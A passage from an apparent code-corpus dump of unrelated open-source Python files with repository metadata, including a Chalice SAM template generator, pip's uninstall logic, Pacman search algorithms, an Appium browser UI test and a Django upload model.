'APIHandler': self._generate_serverless_function(config, code_uri),
'RestAPI': self._generate_rest_api(
config.chalice_app, config.api_gateway_stage),
}
template['Resources'] = resources
self._update_endpoint_url_output(template, config)
return template
def _update_endpoint_url_output(self, template, config):
# type: (Dict[str, Any], Config) -> None
url = template['Outputs']['EndpointURL']['Value']['Fn::Sub']
template['Outputs']['EndpointURL']['Value']['Fn::Sub'] = (
url % config.api_gateway_stage)
def _generate_serverless_function(self, config, code_uri):
# type: (Config, str) -> Dict[str, Any]
properties = {
'Runtime': config.lambda_python_version,
'Handler': 'app.app',
'CodeUri': code_uri,
'Events': self._generate_function_events(config.chalice_app),
'Policies': [self._generate_iam_policy()],
'Tags': self._function_tags(config),
}
if config.environment_variables:
properties['Environment'] = {
'Variables': config.environment_variables
}
return {
'Type': 'AWS::Serverless::Function',
'Properties': properties,
}
def _function_tags(self, config):
# type: (Config) -> Dict[str, str]
tag = 'version=%s:stage=%s:app=%s' % (chalice_version,
config.chalice_stage,
config.app_name)
return {'aws-chalice': tag}
def _generate_function_events(self, app):
# type: (Chalice) -> Dict[str, Any]
events = {}
for _, view in app.routes.items():
for http_method in view.methods:
key_name = ''.join([
view.view_name, http_method.lower(),
hashlib.md5(
view.view_name.encode('utf-8')).hexdigest()[:4],
])
events[key_name] = {
'Type': 'Api',
'Properties': {
'Path': view.uri_pattern,
'RestApiId': {'Ref': 'RestAPI'},
'Method': http_method.lower(),
}
}
return events
def _generate_rest_api(self, app, api_gateway_stage):
# type: (Chalice, str) -> Dict[str, Any]
swagger_definition = self._swagger_generator.generate_swagger(app)
properties = {
'StageName': api_gateway_stage,
'DefinitionBody': swagger_definition,
}
return {
'Type': 'AWS::Serverless::Api',
'Properties': properties,
}
def _generate_iam_policy(self):
# type: () -> Dict[str, Any]
return self._policy_generator.generate_policy_from_app_source()
class AppPackager(object):
def __init__(self,
sam_templater, # type: SAMTemplateGenerator
lambda_packager, # type: LambdaDeploymentPackager
):
# type: (...) -> None
self._sam_templater = sam_templater
self._lambda_packaager = lambda_packager
def _to_json(self, doc):
# type: (Any) -> str
return json.dumps(doc, indent=2, separators=(',', ': '))
def package_app(self, config, outdir):
# type: (Config, str) -> None
# Deployment package
zip_file = os.path.join(outdir, 'deployment.zip')
self._lambda_packaager.create_deployment_package(
config.project_dir, zip_file)
# SAM template
sam_template = self._sam_templater.generate_sam_template(
config, './deployment.zip')
if not os.path.isdir(outdir):
os.makedirs(outdir)
with open(os.path.join(outdir, 'sam.json'), 'w') as f:
f.write(self._to_json(sam_template))
|
[
"js@jamesls.com"
] |
js@jamesls.com
|
6a87563d50a56154d56a3e17b55a97e0d205ef9b
|
aa3dc5ae4fa7d531bbaa75c3008031f2a1b8845d
|
/1460. Make Two Arrays Equal by Reversing Sub-arrays.py
|
bf19eb4de403cc17d243c4a1a98166c93118834e
|
[] |
no_license
|
alankrit03/LeetCode_Solutions
|
354e797d1d5f5a78b116c1f9a3034dd651d71d9a
|
f8ca46afdfbd67509dde63e9cdc5fd178b6f111b
|
refs/heads/master
| 2021-01-08T17:41:22.976375
| 2020-11-03T17:01:37
| 2020-11-03T17:01:37
| 242,097,188
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 150
|
py
|
class Solution:
def canBeEqual(self, target, arr) -> bool:
from collections import Counter
return Counter(target) == Counter(arr)
|
[
"alankritagarwal9@gmail.com"
] |
alankritagarwal9@gmail.com
|
43f07e970a3ab93ee5c4e86d16c7fc72c4f5b1d9
|
64ff0d2b1f12c321e8fe44d0524bb444820b21f7
|
/test/test_parser_yaml.py
|
0c77dd18718c76c0ed43fed9d0a856c302417e4d
|
[
"BSD-2-Clause"
] |
permissive
|
Aniket-Pradhan/python-odml
|
8ffd460cd8560b03f439b46b85fc1c78292c6191
|
48e55a264e38829d90f3b8def37e4d2d7b39337f
|
refs/heads/master
| 2020-12-04T11:32:21.717225
| 2020-01-16T06:34:09
| 2020-01-16T16:59:29
| 231,748,290
| 0
| 0
|
NOASSERTION
| 2020-01-04T10:58:14
| 2020-01-04T10:58:14
| null |
UTF-8
|
Python
| false
| false
| 1,495
|
py
|
import os
import unittest
import yaml
from odml.tools import dict_parser
from odml.tools.parser_utils import ParserException, InvalidVersionException
class TestYAMLParser(unittest.TestCase):
def setUp(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
self.basepath = os.path.join(dir_path, "resources")
self.yaml_reader = dict_parser.DictReader()
def test_missing_root(self):
filename = "missing_root.yaml"
message = "Missing root element"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_missing_version(self):
filename = "missing_version.yaml"
message = "Could not find odml-version"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_invalid_version(self):
filename = "invalid_version.yaml"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(InvalidVersionException):
_ = self.yaml_reader.to_odml(parsed_doc)
|
[
"michael.p.sonntag@gmail.com"
] |
michael.p.sonntag@gmail.com
|
56c2fc2b809384b7692cba50dfc269fcf1af96cc
|
e6f1137903b9658e5e3c1ee51201a931894303b9
|
/deepiu/image_caption/algos/history/v1/show_and_tell_predictor.py
|
63ca6f464f3d5f17f6249c5f15a71bc02c5e91e1
|
[] |
no_license
|
fword/hasky
|
8ed69ef85bb34823d9ade27bb3b19aac02872440
|
d3c680ffa04f7487b931a5575977798157b42b7e
|
refs/heads/master
| 2021-01-23T01:18:49.275631
| 2017-03-18T13:01:27
| 2017-03-18T13:01:27
| 85,898,744
| 1
| 1
| null | 2017-03-23T02:39:06
| 2017-03-23T02:39:06
| null |
UTF-8
|
Python
| false
| false
| 4,840
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ==============================================================================
# \file show_and_tell_predictor.py
# \author chenghuige
# \date 2016-09-04 17:50:21.017234
# \Description
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
flags = tf.app.flags
FLAGS = flags.FLAGS
import numpy as np
import melt
import conf
from conf import IMAGE_FEATURE_LEN, TEXT_MAX_WORDS
import vocabulary
import text2ids
from text2ids import idslist2texts
import gezi
from algos.show_and_tell import ShowAndTell
class SeqDecodeMethod():
max_prob = 0
sample = 1
full_sample = 2
beam_search = 3
class ShowAndTellPredictor(ShowAndTell, melt.PredictorBase):
def __init__(self):
#super(ShowAndTellPredictor, self).__init__()
melt.PredictorBase.__init__(self)
ShowAndTell.__init__(self, False)
def init_predict_texts(self, decode_method=0, beam_size=5):
"""
init for generate texts
"""
self.image_feature_place = tf.placeholder(tf.float32, [None, IMAGE_FEATURE_LEN], name='image')
self.texts = self.build_predict_texts_graph(self.image_feature_place, decode_method, beam_size)
def predict_texts(self, images):
feed_dict = {
self.image_feature_place: images,
}
vocab = vocabulary.get_vocab()
generated_words = self.sess.run(self.texts, feed_dict)
texts = idslist2texts(generated_words)
return texts
def init_predict(self):
self.image_feature_place = tf.placeholder(tf.float32, [None, IMAGE_FEATURE_LEN], name='image')
self.text = tf.placeholder(tf.int64, [None, TEXT_MAX_WORDS])
self.loss = self.build_predict_graph(self.image_feature_place, self.text)
def predict(self, image, text):
"""
default usage is one single image , single text predict one sim score
"""
feed_dict = {
self.image_feature_place: image.reshape([-1, IMAGE_FEATURE_LEN]),
self.text: text.reshape([-1, TEXT_MAX_WORDS]),
}
loss = self.sess.run(self.loss, feed_dict)
return loss
def bulk_predict(self, images, texts):
"""
input multiple images, multiple texts
outupt:
image0, text0_score, text1_score ...
image1, text0_score, text1_score ...
...
"""
scores = []
for image in images:
stacked_images = np.array([image] * len(texts))
score = self.predict(stacked_images, texts)
scores.append(score)
return np.array(scores)
def build_predict_texts_graph(self, image, decode_method=0, beam_size=5):
"""
@TODO beam search, early stop maybe need c++ op
"""
batch_size = tf.shape(image)[0]
image_emb = tf.matmul(image, self.encode_img_W) + self.encode_img_b
state = self.cell.zero_state(batch_size, tf.float32)
generated_words = []
max_words = TEXT_MAX_WORDS
with tf.variable_scope("RNN"):
(output, state) = self.cell(image_emb, state)
last_word = tf.nn.embedding_lookup(self.emb, tf.zeros([batch_size], tf.int32)) + self.bemb
#last_word = image_emb
for i in range(max_words):
#if i > 0: tf.get_variable_scope().reuse_variables()
tf.get_variable_scope().reuse_variables()
(output, state) = self.cell(last_word, state)
with tf.device('/cpu:0'):
logit_words = tf.matmul(output, self.embed_word_W) + self.embed_word_b
top_prob_words = None
if decode_method == SeqDecodeMethod.max_prob:
max_prob_word = tf.argmax(logit_words, 1)
elif decode_method == SeqDecodeMethod.sample:
max_prob_word = tf.nn.top_k(logit_words, beam_size)[1][:, np.random.choice(beam_size, 1)]
elif decode_method == SeqDecodeMethod.full_sample:
top_prob_words = tf.nn.top_k(logit_words, beam_size)[1]
max_prob_word = top_prob_words[:, np.random.choice(beam_size, 1)]
elif decode_method == SeqDecodeMethod.beam_search:
raise ValueError('beam search nor implemented yet')
else:
raise ValueError('not supported decode method')
last_word = tf.nn.embedding_lookup(self.emb, max_prob_word) + self.bemb
max_prob_word = tf.reshape(max_prob_word, [batch_size, -1])
if top_prob_words is not None:
generated_words.append(top_prob_words)
else:
generated_words.append(max_prob_word)
generated_words = tf.concat(1, generated_words)
return generated_words
def build_predict_graph(self, image, text):
image = tf.reshape(image, [1, IMAGE_FEATURE_LEN])
text = tf.reshape(text, [1, TEXT_MAX_WORDS])
loss = self.build_graph(image, text, is_tranining=False)
return loss
|
[
"29109317@qq.com"
] |
29109317@qq.com
|
4e3d7ecbd55853ed72a0d64d4f743af1f873e7b8
|
ce4f1810b8011f05f4e9f8b67959b6a2994ac821
|
/GAVOCoverage/temp-python/lib/python2.7/site-packages/pip/req/req_uninstall.py
|
90a593628d08a707f6d3d9fc6c65406149bd8b5e
|
[] |
no_license
|
Hyradus/VO_QGIS3.x_plugin
|
b11d3b18e473861b6d0733c3783c40af6e8eb039
|
9ab9acb4756c415797b5a7e64389978a84a32c23
|
refs/heads/master
| 2022-04-14T00:25:12.283460
| 2020-04-02T17:18:50
| 2020-04-02T17:18:50
| 248,215,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,937
|
py
|
from __future__ import absolute_import
from builtins import object
import logging
import os
import tempfile
from pip.compat import uses_pycache, WINDOWS, cache_from_source
from pip.exceptions import UninstallationError
from pip.utils import rmtree, ask, is_local, renames, normalize_path
from pip.utils.logging import indent_log
logger = logging.getLogger(__name__)
class UninstallPathSet(object):
"""A set of file paths to be removed in the uninstallation of a
requirement."""
def __init__(self, dist):
self.paths = set()
self._refuse = set()
self.pth = {}
self.dist = dist
self.save_dir = None
self._moved_paths = []
def _permitted(self, path):
"""
Return True if the given path is one we are permitted to
remove/modify, False otherwise.
"""
return is_local(path)
def add(self, path):
head, tail = os.path.split(path)
# we normalize the head to resolve parent directory symlinks, but not
# the tail, since we only want to uninstall symlinks, not their targets
path = os.path.join(normalize_path(head), os.path.normcase(tail))
if not os.path.exists(path):
return
if self._permitted(path):
self.paths.add(path)
else:
self._refuse.add(path)
# __pycache__ files can show up after 'installed-files.txt' is created,
# due to imports
if os.path.splitext(path)[1] == '.py' and uses_pycache:
self.add(cache_from_source(path))
def add_pth(self, pth_file, entry):
pth_file = normalize_path(pth_file)
if self._permitted(pth_file):
if pth_file not in self.pth:
self.pth[pth_file] = UninstallPthEntries(pth_file)
self.pth[pth_file].add(entry)
else:
self._refuse.add(pth_file)
def compact(self, paths):
"""Compact a path set to contain the minimal number of paths
necessary to contain all paths in the set. If /a/path/ and
/a/path/to/a/file.txt are both in the set, leave only the
shorter path."""
short_paths = set()
for path in sorted(paths, key=len):
if not any([
(path.startswith(shortpath) and
path[len(shortpath.rstrip(os.path.sep))] == os.path.sep)
for shortpath in short_paths]):
short_paths.add(path)
return short_paths
def _stash(self, path):
return os.path.join(
self.save_dir, os.path.splitdrive(path)[1].lstrip(os.path.sep))
def remove(self, auto_confirm=False):
"""Remove paths in ``self.paths`` with confirmation (unless
``auto_confirm`` is True)."""
if not self.paths:
logger.info(
"Can't uninstall '%s'. No files were found to uninstall.",
self.dist.project_name,
)
return
logger.info(
'Uninstalling %s-%s:',
self.dist.project_name, self.dist.version
)
with indent_log():
paths = sorted(self.compact(self.paths))
if auto_confirm:
response = 'y'
else:
for path in paths:
logger.info(path)
response = ask('Proceed (y/n)? ', ('y', 'n'))
if self._refuse:
logger.info('Not removing or modifying (outside of prefix):')
for path in self.compact(self._refuse):
logger.info(path)
if response == 'y':
self.save_dir = tempfile.mkdtemp(suffix='-uninstall',
prefix='pip-')
for path in paths:
new_path = self._stash(path)
logger.debug('Removing file or directory %s', path)
self._moved_paths.append(path)
renames(path, new_path)
for pth in list(self.pth.values()):
pth.remove()
logger.info(
'Successfully uninstalled %s-%s',
self.dist.project_name, self.dist.version
)
def rollback(self):
"""Rollback the changes previously made by remove()."""
if self.save_dir is None:
logger.error(
"Can't roll back %s; was not uninstalled",
self.dist.project_name,
)
return False
logger.info('Rolling back uninstall of %s', self.dist.project_name)
for path in self._moved_paths:
tmp_path = self._stash(path)
logger.debug('Replacing %s', path)
renames(tmp_path, path)
for pth in list(self.pth.values()):
pth.rollback()
def commit(self):
"""Remove temporary save dir: rollback will no longer be possible."""
if self.save_dir is not None:
rmtree(self.save_dir)
self.save_dir = None
self._moved_paths = []
class UninstallPthEntries(object):
def __init__(self, pth_file):
if not os.path.isfile(pth_file):
raise UninstallationError(
"Cannot remove entries from nonexistent file %s" % pth_file
)
self.file = pth_file
self.entries = set()
self._saved_lines = None
def add(self, entry):
entry = os.path.normcase(entry)
# On Windows, os.path.normcase converts the entry to use
# backslashes. This is correct for entries that describe absolute
# paths outside of site-packages, but all the others use forward
# slashes.
if WINDOWS and not os.path.splitdrive(entry)[0]:
entry = entry.replace('\\', '/')
self.entries.add(entry)
def remove(self):
logger.debug('Removing pth entries from %s:', self.file)
with open(self.file, 'rb') as fh:
# windows uses '\r\n' with py3k, but uses '\n' with py2.x
lines = fh.readlines()
self._saved_lines = lines
if any(b'\r\n' in line for line in lines):
endline = '\r\n'
else:
endline = '\n'
for entry in self.entries:
try:
logger.debug('Removing entry: %s', entry)
lines.remove((entry + endline).encode("utf-8"))
except ValueError:
pass
with open(self.file, 'wb') as fh:
fh.writelines(lines)
def rollback(self):
if self._saved_lines is None:
logger.error(
'Cannot roll back changes to %s, none were made', self.file
)
return False
logger.debug('Rolling %s back to previous state', self.file)
with open(self.file, 'wb') as fh:
fh.writelines(self._saved_lines)
return True
|
[
"giacomo.nodjoumi@hyranet.info"
] |
giacomo.nodjoumi@hyranet.info
|
c5c52a34b30735cf8048a66d5858079d6df8527b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/vAk9SBqYmj6hXKfrD_16.py
|
a18522316d4af7072720d687cb474b1b2f6e58b9
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 424
|
py
|
"""
In this challenge, you have to implement a function that returns the given
distance `kilometers` converted into miles. You have to round the result up to
the fifth decimal digit.
### Examples
km_to_miles(2) ➞ 1.24274
km_to_miles(6) ➞ 3.72823
km_to_miles(8) ➞ 4.97097
### Notes
1 kilometer = 0.621371 miles.
"""
def km_to_miles(kilometers):
return round(kilometers * 0.621371, 5)
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
1955002f06ce2a8c4cb851a8219ebe39c214db28
|
8f0ee068dc5f78491812ee8fec4ecc4ad48be8b5
|
/search/search.py
|
fc18b93f5127bdc5849bdba83db82fd26f0fd190
|
[] |
no_license
|
russkingit/Pacman-project-Artificial-Intellengence-python
|
b36dc48b12f35082b6ac2aac4620d50dec9b3ddf
|
553618ed58de51a7c1d1eaa90fb0441dc9d8e34b
|
refs/heads/master
| 2020-04-20T02:27:31.226385
| 2019-02-01T05:03:40
| 2019-02-01T05:03:40
| 168,390,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,893
|
py
|
# search.py
# ---------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
In search.py, you will implement generic search algorithms which are called by
Pacman agents (in searchAgents.py).
"""
import util
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem.
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state.
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost' is
the incremental cost of expanding to that successor.
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions.
The sequence must be composed of legal moves.
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other maze, the
sequence of moves will be incorrect, so only use this for tinyMaze.
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first.
Your search algorithm needs to return a list of actions that reaches the
goal. Make sure to implement a graph search algorithm.
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print "Start:", problem.getStartState()
print "Is the start a goal?", problem.isGoalState(problem.getStartState())
print "Start's successors:", problem.getSuccessors(problem.getStartState())
"""
"*** YOUR CODE HERE ***"
fringe = util.Stack()
visited = []
path = []
tmpPath = util.Stack() #store path to each succesor
currentState = problem.getStartState()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
fringe.push(successor)
tmpPath.push(path + [action])
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def breadthFirstSearch(problem):
"""Search the shallowest nodes in the search tree first."""
"*** YOUR CODE HERE ***"
fringe = util.Queue()
visited = []
path = []
tmpPath = util.Queue() #store path to each succesor
currentState = problem.getStartState()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
fringe.push(successor)
tmpPath.push(path + [action])
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def uniformCostSearch(problem):
"""Search the node of least total cost first."""
"*** YOUR CODE HERE ***"
fringe = util.PriorityQueue()
visited = []
path = []
tmpPath = util.PriorityQueue() #store path to each succesor
fringe.push(problem.getStartState(),0)
currentState = fringe.pop()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
tmpCost = problem.getCostOfActions(path+ [action])
fringe.push(successor, tmpCost)
tmpPath.push(path + [action], tmpCost)
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"*** YOUR CODE HERE ***"
fringe = util.PriorityQueue()
visited = []
path = []
tmpPath = util.PriorityQueue() #store path to each succesor
fringe.push(problem.getStartState(),0)
currentState = fringe.pop()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
tmpCost = problem.getCostOfActions(path+ [action]) + heuristic(successor, problem) #f(n) = g(n) +h(n)
fringe.push(successor, tmpCost)
tmpPath.push(path + [action], tmpCost)
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() ##path to currentState from startState
return path
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
|
[
"unconfigured@null.spigotmc.org"
] |
unconfigured@null.spigotmc.org
|
0e04795723c5e4257eec9e7bdd971712e6369da2
|
32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd
|
/benchmark/tintbrowser/testcase/firstcases/testcase7_023.py
|
fb1e9d767741ee7ec7143ea90c07655d38f16cfe
|
[] |
no_license
|
Prefest2018/Prefest
|
c374d0441d714fb90fca40226fe2875b41cf37fc
|
ac236987512889e822ea6686c5d2e5b66b295648
|
refs/heads/master
| 2021-12-09T19:36:24.554864
| 2021-12-06T12:46:14
| 2021-12-06T12:46:14
| 173,225,161
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,905
|
py
|
#coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.tint',
'appActivity' : 'org.tint.ui.activities.TintBrowserActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.tint/org.tint.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase023
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/BtnAddTab\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Tap to enter an URL or a search.\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/BookmarkRow.Thumbnail\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/MenuButton\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(82)
driver.press_keycode(82)
element = getElememtBack(driver, "new UiSelector().text(\"Decline\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Full screen\")", "new UiSelector().className(\"android.widget.TextView\").instance(3)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/ExitFullScreen\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12st://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12tp://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("test://tests//en.m.wikipedia.org/wiki/Main_Page");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarGoStopReload\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"http://test//test12s//hk.mobi.yahoo.com/\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("http://tests//en.m.wikipedia.org/wiki/Main_Page");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12st://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("test://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("http://tests//en.m.wikipedia.org/wiki/Main_Page");
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"7_023\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.tint'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage)
|
[
"prefest2018@gmail.com"
] |
prefest2018@gmail.com
|
66ae5218e083cec68b52061e500c88077eb68ff4
|
0c95806a805e63a65ce524bac9f2c230c08787dc
|
/examples/get_temps.py
|
18a948ce04c96b2251e7cff05c33435f375c1809
|
[
"MIT"
] |
permissive
|
chenchix/melcloud
|
4a8e9684e4f38e63871ec543b6a1fdb22fc7628e
|
64fe66195ca4e0811391f9b52670ff27954043de
|
refs/heads/master
| 2022-08-16T01:34:40.749190
| 2020-05-29T08:27:40
| 2020-05-29T08:52:47
| 267,796,720
| 0
| 0
| null | 2020-05-29T07:40:36
| 2020-05-29T07:40:36
| null |
UTF-8
|
Python
| false
| false
| 957
|
py
|
# coding=utf-8
from melcloud import MELCloud
from melcloud.constants import Languages
__author__ = "Gareth Coles"
platform = MELCloud(Languages.EN)
platform.login("<EMAIL ADDRESS>", "<PASSWORD>")
if platform.logged_in:
print(f"Logged in as {platform.account.name}")
platform.load_devices()
for building in platform.buildings:
print(f"Building: {building.id} ({building.name})")
for floor in building.floors:
print(f"> Floor: {floor.id} ({floor.name})")
for device in floor.devices:
print(f">> Device: {device.device_id} ({device.device_name})")
print(f" Zone 1: Currently: {device.room_temperature_zone_1}, Target: {device.set_temperature_zone_1}")
print(f" Zone 2: Currently: {device.room_temperature_zone_2}, Target: {device.set_temperature_zone_2}")
print(f" Current weather: {device.weather_observations[0].condition_name}")
|
[
"gdude2002@gmail.com"
] |
gdude2002@gmail.com
|
9df24ae01ad33110298fab7d26828948da2c375d
|
65148257eabf62c5a60c5a2723792c3549887f49
|
/froide/upload/models.py
|
9ff7dd6fd021ba5cbe44e90f0ae71f86445b1fb8
|
[
"MIT"
] |
permissive
|
infoaed/froide
|
083ba5d501f10c29f6f75bc7ae656ebee98fc08c
|
532b626e62f6ad3d5017261d305721d00c16cd43
|
refs/heads/master
| 2021-02-11T17:20:02.449999
| 2020-03-02T17:01:19
| 2020-03-02T17:01:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,279
|
py
|
import json
import os
import tempfile
import uuid
from django.db import models
from django.urls import resolve, Resolver404
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.core.files import File
from django_fsm import FSMField, transition
from .utils import write_bytes_to_file
class states:
INITIAL = 'initial'
RECEIVING = 'receiving'
SAVING = 'saving'
DONE = 'done'
class TusFile(File):
"""
A TUS uploaded file, allow direct move
"""
def temporary_file_path(self):
"""Return the full path of this file."""
return self.file.name
class AbstractUpload(models.Model):
"""
Abstract model for managing TUS uploads
"""
guid = models.UUIDField(_('GUID'), default=uuid.uuid4, unique=True)
state = FSMField(default=states.INITIAL)
upload_offset = models.BigIntegerField(default=0)
upload_length = models.BigIntegerField(default=-1)
upload_metadata = models.TextField(blank=True)
filename = models.CharField(max_length=255, blank=True)
